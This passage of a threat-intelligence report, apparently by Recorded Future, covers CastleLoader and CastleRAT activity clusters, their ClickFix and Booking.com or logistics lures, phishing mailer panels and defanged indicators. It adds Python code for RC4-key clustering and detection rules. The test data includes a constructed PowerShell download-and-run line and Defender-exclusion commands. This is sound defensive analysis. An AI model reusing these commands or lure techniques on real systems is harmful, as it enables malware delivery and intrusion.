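    ("104[.]225[.]129[.]171", b"NanuchkaUpyachka"),
    ("144[.]208[.]126[.]50",  b"NanuchkaUpyachka"),
    ("195[.]85[.]115[.]44",   b"NanuchkaUpyachka"),
    ("195[.]85[.]115[.]44",   b"hypothetical-k01"),  # second key on the same node
    ("77[.]238[.]241[.]203",  b"hypothetical-k01"),
    ("5[.]35[.]44[.]176",     b"hypothetical-k02"),  # isolated cluster
]


class UnionFind:
    """Minimal disjoint-set forest with path halving."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def key_clusters(observations):
    """Per-key clusters: RC4 key -> set of C2 nodes configured with it."""
    clusters = defaultdict(set)
    for ip, key in observations:
        clusters[key].add(ip)
    return dict(clusters)


def bridging_nodes(observations):
    """C2 nodes observed with more than one key; these are what link clusters."""
    keys_per_ip = defaultdict(set)
    for ip, key in observations:
        keys_per_ip[ip].add(key)
    return {ip for ip, keys in keys_per_ip.items() if len(keys) > 1}


def merged_clusters(observations):
    """Connected components of the bipartite node/key graph.

    Each component is (frozenset of keys, frozenset of nodes). A component
    holding several keys is a group of per-key clusters that overlap through
    shared infrastructure; a single-key component is an isolated cluster.
    """
    uf = UnionFind()
    for ip, key in observations:
        uf.union(("key", key), ("ip", ip))
    comps = defaultdict(lambda: (set(), set()))
    for ip, key in observations:
        root = uf.find(("ip", ip))
        comps[root][0].add(key)
        comps[root][1].add(ip)
    return [(frozenset(k), frozenset(n)) for k, n in comps.values()]


if __name__ == "__main__":
    for keys, nodes in merged_clusters(OBSERVATIONS):
        print(sorted(k.decode() for k in keys), "->", sorted(nodes))
```

Extracting the key from each sample is the part this example leaves out; in practice that is a YARA string match or a config parser per variant, and the resulting (node, key) pairs are fed to `merged_clusters`. The same pass works for any other shared artifact (for example a WHOIS SOA email address) by substituting it for the key.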
Figure 4: RC4 key clusters (Source: Recorded Future)
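As an added illustration, not code from the report, the following Python sketch shows how an analyst could triage captured CastleRAT traffic for the three signals described above: the trailer-based handshake variants, same-day contact with more than one C2, and the transitive RC4-key clustering behind Figure 4. The flow records, the victim addresses (RFC 5737 range) and every key other than NanuchkaUpyachka are constructed; the C2 addresses are the ones named in the report.

```python
from collections import defaultdict
from datetime import datetime

# Trailer bytes from the CastleRAT C-variant exchanges described in the report.
CLIENT_STANDARD = bytes.fromhex("01000000")
CLIENT_EXTENDED = bytes.fromhex("07000000")
SERVER_EXTENDED = bytes.fromhex("9eff7470")
RC4_KEY_LEN = 16  # the reconnect stage carries only the encrypted 16-byte RC4 key


def classify_handshake(client_msg: bytes, server_msg: bytes) -> str:
    """Label one request/response pair by the trailer pattern it matches.
    Checks run from most to least specific, so a bare 16-byte blob is never
    mistaken for a standard request that happens to end in 01 00 00 00."""
    if len(client_msg) == RC4_KEY_LEN and server_msg.endswith(CLIENT_STANDARD):
        return "key-push"        # client sends the key blob, server answers 01 00 00 00
    if client_msg.endswith(CLIENT_STANDARD) and len(server_msg) == RC4_KEY_LEN:
        return "key-pull"        # client sends 01 00 00 00, server returns only the key blob
    if client_msg.endswith(CLIENT_EXTENDED) and server_msg.endswith(SERVER_EXTENDED):
        return "extended-hello"  # 07 00 00 00 request, 9e ff 74 70 response
    if client_msg.endswith(CLIENT_STANDARD):
        return "standard"
    return "unknown"


def concurrent_c2_contacts(flows, known_c2):
    """Hosts that reached two or more known C2s inside the same daily collection window."""
    seen = defaultdict(set)
    for ts, src, dst in flows:
        if dst in known_c2:
            seen[(src, ts.date())].add(dst)
    return {k: v for k, v in seen.items() if len(v) >= 2}


def c2_to_c2_contacts(flows, known_c2):
    """Direct traffic between two known C2 addresses (the interconnected-infrastructure signal)."""
    return sorted({(src, dst) for _, src, dst in flows if src in known_c2 and dst in known_c2})


def cluster_by_rc4_key(c2_keys):
    """Union-find over C2 addresses: two C2s fall into one cluster when they share a key,
    transitively, which is how key-overlap clusters like those in Figure 4 are formed."""
    parent = {ip: ip for ip in c2_keys}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    by_key = defaultdict(list)
    for ip, keys in c2_keys.items():
        for key in keys:
            by_key[key].append(ip)
    for ips in by_key.values():
        for other in ips[1:]:
            parent[find(other)] = find(ips[0])
    clusters = defaultdict(set)
    for ip in c2_keys:
        clusters[find(ip)].add(ip)
    return sorted(clusters.values(), key=lambda s: (-len(s), sorted(s)))


# Constructed sample data: victims use the RFC 5737 test range, and every key
# except NanuchkaUpyachka is a placeholder. (timestamp, source, destination)
KNOWN_C2 = {"104.225.129.171", "144.208.126.50", "195.85.115.44"}
FLOWS = [
    (datetime(2025, 10, 1, 9, 5), "198.51.100.10", "104.225.129.171"),
    (datetime(2025, 10, 1, 9, 6), "198.51.100.10", "144.208.126.50"),
    (datetime(2025, 10, 1, 11, 0), "198.51.100.11", "104.225.129.171"),
    (datetime(2025, 10, 1, 11, 2), "198.51.100.11", "144.208.126.50"),
    (datetime(2025, 10, 1, 12, 0), "198.51.100.12", "104.225.129.171"),
    (datetime(2025, 10, 2, 8, 0), "198.51.100.12", "144.208.126.50"),   # next day: migration, not concurrency
    (datetime(2025, 10, 1, 9, 7), "104.225.129.171", "195.85.115.44"),  # one C2 talking to another
]
C2_KEYS = {
    "104.225.129.171": {"NanuchkaUpyachka"},
    "144.208.126.50": {"NanuchkaUpyachka"},
    "195.85.115.44": {"NanuchkaUpyachka", "PLACEHOLDER-KEY-B"},
    "77.238.241.203": {"PLACEHOLDER-KEY-B"},
    "5.35.44.176": {"PLACEHOLDER-KEY-C"},
}

if __name__ == "__main__":
    print(classify_handshake(bytes(20) + CLIENT_EXTENDED, b"\x00" + SERVER_EXTENDED))
    print(concurrent_c2_contacts(FLOWS, KNOWN_C2))
    print(c2_to_c2_contacts(FLOWS, KNOWN_C2))
    print(cluster_by_rc4_key(C2_KEYS))
```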
CastleLoader
Infrastructure Analysis
Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in Appendix A. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.
Notably, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.
Activity Clusters
Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 4). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.
Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.
Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160
Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader alongside additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and compromised infrastructure. Additionally, it has been observed exploiting weaknesses in target organizations’ systems, such as spoofing legitimate email senders from logistics companies, to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight & Analytics and Loadlink Technologies for multiple purposes.
Attack Flow
Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5 illustrates a high-level overview of the phishing attack flow.
Figure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)
The attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example, englandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.
The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt Group has observed multiple variations of these landing pages.
Figure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)
Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, loadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.
Figure 7: “dpeforms” page found in Google Search (Source: Recorded Future)
After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see Figure 8). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.
Figure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)
By following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using pythonw.exe, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.
Figure 9: ClickFix command (Source: Recorded Future)
Use of Compromised Infrastructure
As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.
Infrastructure Analysis
Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of these domains include the subdomain apps[.]englandlogistics (for example, apps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, loadstrucking[.]com, instead featured the subdomain app[.]england, following a similar naming pattern.
Insikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between July 6 and September 26, 2025, which was serving the file newtag.zip (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.
Domain Re-Registration Tactic
Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. Figure 10 provides two examples of this activity.
Figure 10: Re-registration of logistics-themed domains (Source: Recorded Future)
Notably, the domain cdlfreightlogistics[.]com appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain hometownlogisticsllc[.]com hosted a website for Hometown Logistics LLC in 2021 (see Figure 11).
Figure 11: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)
Public Complaints and Suspected Access to DAT and Loadlink
Some of the domains listed in the Infrastructure Analysis section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address david[@]cdlfreightlogistics[.]com, associated with the domain cdlfreightlogistics[.]com, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see Figure 12). Several respondents indicated they did not believe it to be legitimate.
Figure 12: Example phishing email sent by TAG-160 (Source: Recorded Future)
While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.
In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight & Analytics (dat.com) and Loadlink Technologies (loadlink.ca), both platforms operating in the freight matching industry (see Figure 13). The fraudulent registrations used fake company information, including the email address paul[@]mrlogsol[.]ca, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.
Figure 13: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)
Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, maritza[.]rmlogisticsol[@]gmail[.]com (see Figure 14).
Figure 14: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)
Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see Figure 13) and further supported by additional profiles identified by Insikt Group (see Figure 15). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains dat[.]com and loadlink[.]ca observed in Recorded Future Identity Intelligence.
Figure 15: Account information linked to TAG-160 (Source: Recorded Future)
Access to platforms like DAT Freight & Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.
Possible Overlap with September 2024 Campaign
In September 2024, Proofpoint reported on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: the threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on the DAT Freight & Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.
While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight & Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).
Notably, in November 2025, Proofpoint reported again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.
Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161
Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader, and Insikt Group has also observed it delivering other payloads, notably Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified previously unreported phishing email management tooling, which appears to be used by threat actors linked to Cluster 2.
Matanbuchus Activity and Booking.com-Themed Infrastructure
Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, 185[.]39[.]19[.]164 (see Figure 16).
Figure 16: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)
Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. BelialDemon offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the HTTPS-based version and $15,000 per month for the DNS-based version.
Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing communicated with its C2 server at mechiraz[.]com, a domain behind Cloudflare but linked to the IP address 5[.]178[.]1[.]8 (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain nicewk[.]com, previously reported by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including galaxioflow[.]com and nimbusvaults[.]com.
Additional Booking.com-Themed Infrastructure
By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in Appendix D, are tracked by Insikt Group as part of Cluster 2.
Phishing Email Management Tooling
By analyzing the IP addresses hosting the domains listed in Appendix D, Insikt Group identified three that stood out because each hosted three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email” (“Email Manager”), “Менеджер Редиректов и рассылок” (“Redirect and Mailing Manager”), and “Менеджер Редиректов и Email” (“Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.
Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)
The first website, hosted on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see Figure 17). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.
Figure 17: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)
Within the document object model (DOM) of the website, Insikt Group identified two email addresses, one of which is likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.
Additionally, the DOM referenced a set of domains, some of which are listed in Appendix D, while others were newly identified and are listed in Appendix E. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in Appendix E.
Website 2: Email Manager (“Менеджер Email”)
The second website, hosted on port 56724, closely resembles the first “Redirect and Email Manager” panel but exhibits several notable configuration differences (see Figure 18). These include a distinct AWS username, an SMTP sender address, bred[@]booking-porta[.]com, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified 109[.]104[.]153[.]87 as its proxy server.
Figure 18: Page linked to “Email Manager” tool (Source: Recorded Future)
Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)
The third website, hosted on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see Figure 19). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: [identifier].[base_name].[main_domain].
Figure 19: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)
The domains site-riko[.]com, site-sero[.]com, site-silo[.]com, site-tiko[.]com, and site-filo[.]com are all referenced within the DOM.
Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in Table 1.
IP Address               Ports
109[.]104[.]153[.]100    11599, 12305, 13267, 13275
109[.]104[.]153[.]193    10324, 10616, 14195, 14196
109[.]104[.]153[.]29     13413, 14900
109[.]104[.]154[.]67     11264, 11860, 14100, 14122
Table 1: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)
Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in Table 2. The domains hosted on these IP addresses are listed in Appendix H.
IP Address            ASN                         Notes
85[.]208[.]84[.]65    STIMUL-AS, RU (AS211659)    Certificate subject common name: guesitastayhotel[.]com; CastleRAT and Matanbuchus C2 servers identified within the same /24 range (85[.]208[.]84[.]115 and 85[.]208[.]84[.]242, respectively)
80[.]64[.]18[.]245    STIMUL-AS, RU (AS211659)    Hosts hotel-themed domains
185[.]39[.]19[.]94    OPTIMA-AS, RU (AS216341)    Certificate subject common name: guesitastayhotel[.]com
88[.]214[.]50[.]83    OPTIMA-AS, RU (AS216341)    Suspected testing server due to the number of domains including the keywords “test” and “demo”
Table 2: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)
ASN Cluster Possibly Linked to Bearhost
Insikt Group observed significant infrastructure activity associated with AS211659 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers maintain strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, and MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.
Infrastructure Similarities with TAG-157 (RefBroker)
Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address 77[.]83[.]207[.]56, adjacent to 77[.]83[.]207[.]55, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section ASN Cluster Possibly Linked to Bearhost. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.
Cluster 3: Booking.com Impersonation Activity
Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.
Infrastructure Analysis
Insikt Group noted a CastleRAT sample that leveraged a Booking.com phishing domain, update-info4468765[.]com (see Figure 20). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from boiksal[.]com/upd. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (update.exe), using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, programsbookss[.]com, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see Figure 21). CastleRAT samples that use Steam for dead drops may sometimes contain a hard-coded backup C2 in the event the dead drop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in Appendix F.
Figure 20: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)
At the time of analysis, update-info4468765[.]com and boiksal[.]com were both hosted on 178[.]17[.]57[.]103, while the Steam-resolved C2 domain, programsbookss[.]com, was hosted on an adjacent IP, 178[.]17[.]57[.]102. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the 192[.]109[.]138[.]0/24 range, where Booking.com-themed phishing domains were hosted on 192[.]109[.]138[.]103 and the Steam-resolved C2 domains, programsbookss[.]com and justnewdmain[.]com, were hosted on 192[.]109[.]138[.]102.
Figure 21: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)
When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed Turnstile page or a “turnstile token missing” error message. Further pivoting from the domain boiksal[.]com uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in Appendix G. Notably, while the domains commonly use Cloudflare name servers, many of them ultimately resolve to threat actor–controlled IP addresses.
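As an added example that is not part of the report, the following Python rules turn two of the endpoint behaviours described in this report into detection logic over Sysmon-style process-creation and network events: the TAG-160 ClickFix chain that ends in pythonw.exe (Attack Flow section), and the Cluster 3 loader’s burst of PowerShell Add-MpPreference exclusions followed by a non-browser process fetching a Steam Community page. All events, hostnames, file paths and the 203.0.113.5 download address are constructed; the field names are assumptions modelled on Sysmon, not a specific product’s schema.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Inputs mimic Sysmon-style process-creation (Event ID 1) and network (Event ID 3) records.
IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}\b", re.I)
EXCLUSION = re.compile(r"add-mppreference\s.*-exclusion(?:path|process|extension)", re.I)
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe")
STEAM_OK = ("steam.exe", "steamwebhelper.exe", "chrome.exe", "msedge.exe", "firefox.exe")


def detect_clickfix_pythonw(proc_events):
    """Rule A: a shell spawned by explorer.exe (the Run dialog) whose command line pulls
    from an IP-literal URL and hands execution to pythonw.exe, as in the TAG-160 ClickFix chain."""
    hits = []
    for ev in proc_events:
        if (ev["parent"].lower().endswith("explorer.exe")
                and ev["image"].lower().endswith(SHELLS)
                and IP_URL.search(ev["cmd"])
                and "pythonw" in ev["cmd"].lower()):
            hits.append((ev["host"], ev["ts"]))
    return hits


def detect_exclusion_flood(proc_events, threshold=5, window=timedelta(seconds=60)):
    """Rule B: a burst of PowerShell processes adding Defender exclusions on one host,
    the UAC-prompt flooding loop used by the Cluster 3 loader. Returns host -> peak count."""
    per_host = defaultdict(list)
    for ev in proc_events:
        if ev["image"].lower().endswith("powershell.exe") and EXCLUSION.search(ev["cmd"]):
            per_host[ev["host"]].append(ev["ts"])
    flagged = {}
    for host, times in per_host.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[host] = peak
    return flagged


def detect_steam_dead_drop(net_events, allowed=STEAM_OK):
    """Rule C: a process that is neither Steam nor a browser fetching steamcommunity.com,
    the dead-drop resolver pattern. Returns (host, image) pairs."""
    return [(ev["host"], ev["image"]) for ev in net_events
            if ev["dest_host"].lower().endswith("steamcommunity.com")
            and not ev["image"].lower().endswith(allowed)]


T0 = datetime(2025, 10, 1, 14, 0, 0)
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LOADER = r"C:\Users\victim\AppData\Local\Temp\stage.exe"   # hypothetical .NET loader path
PAYLOAD = r"C:\Users\victim\AppData\Roaming\update.exe"    # payload name taken from the report

# Constructed telemetry: WS-01 follows the infection chain, WS-02 is an admin's normal activity.
PROC_EVENTS = [
    {"ts": T0, "host": "WS-01", "parent": r"C:\Windows\explorer.exe", "image": POWERSHELL,
     "cmd": r'powershell.exe -w hidden -c "... http://203.0.113.5/pkg.zip ... pythonw.exe $env:TEMP\pkg\app.pyw ..."'},
] + [
    {"ts": T0 + timedelta(seconds=40 + 3 * i), "host": "WS-01", "parent": LOADER, "image": POWERSHELL,
     "cmd": f"powershell.exe -Command Add-MpPreference -ExclusionPath '{PAYLOAD}'"}
    for i in range(6)
] + [
    {"ts": T0 + timedelta(minutes=5), "host": "WS-02", "parent": r"C:\Windows\explorer.exe", "image": POWERSHELL,
     "cmd": r"powershell.exe -Command Add-MpPreference -ExclusionPath 'D:\Builds'"},
]
NET_EVENTS = [
    {"ts": T0 + timedelta(seconds=70), "host": "WS-01", "image": PAYLOAD, "dest_host": "steamcommunity.com"},
    {"ts": T0 + timedelta(minutes=9), "host": "WS-02",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest_host": "steamcommunity.com"},
]

if __name__ == "__main__":
    print("ClickFix/pythonw:", detect_clickfix_pythonw(PROC_EVENTS))
    print("exclusion flood :", detect_exclusion_flood(PROC_EVENTS))
    print("steam dead drop :", detect_steam_dead_drop(NET_EVENTS))
```

Rule B’s threshold is deliberately above the single exclusion an administrator adds by hand, so WS-02 is not flagged while the six-in-sixteen-seconds burst on WS-01 is.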
Cluster 4: Malvertising and Fake Software
Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.
Based on Insikt Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including wereatwar[.]com. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as 37[.]230[.]62[.]235 and 84[.]200[.]81[.]32. Notably, the domain jshanoi[.]com resolved to these NetSupport-associated IP addresses during the period of activity.
The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those observed in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.
Possible Connection to Exploit Forum User Sparja
